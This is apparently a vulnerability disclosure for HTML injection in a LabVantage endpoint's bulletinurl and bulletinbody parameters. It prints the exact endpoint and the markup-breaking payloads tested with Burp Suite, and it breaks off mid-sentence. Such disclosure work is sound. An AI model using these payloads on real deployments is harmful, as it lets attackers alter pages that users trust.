POST /labvantage/rc?command=file&file=WEB-OPAL/pagetypes/bulletins/sendbulletin.jspbulletinurl, bulletinbodyThe following steps were used to identify and confirm the HTML injection vulnerability in the bulletinurl and bulletinbody parameters of the POST request to the affected endpoint. The testing was conducted using Burp Suite.
bulletinurl and bulletinbody:
bulletinurl: testURL"><h1><font color=blue>PwnTest</h1><textarea></textarea><a href="bulletinbody: Message 1</textarea><h1>pwn</h1><div STYLE="background-image: url();"><textarea>
Figure 1: The request made by adding the HTML injection payloads to the bulletinurl and bulletinbody parameters.
HTML injection vulnerabilities can be exploited by attackers to manipulate the structure and content of a web page. This can lead to various malicious activities, such as: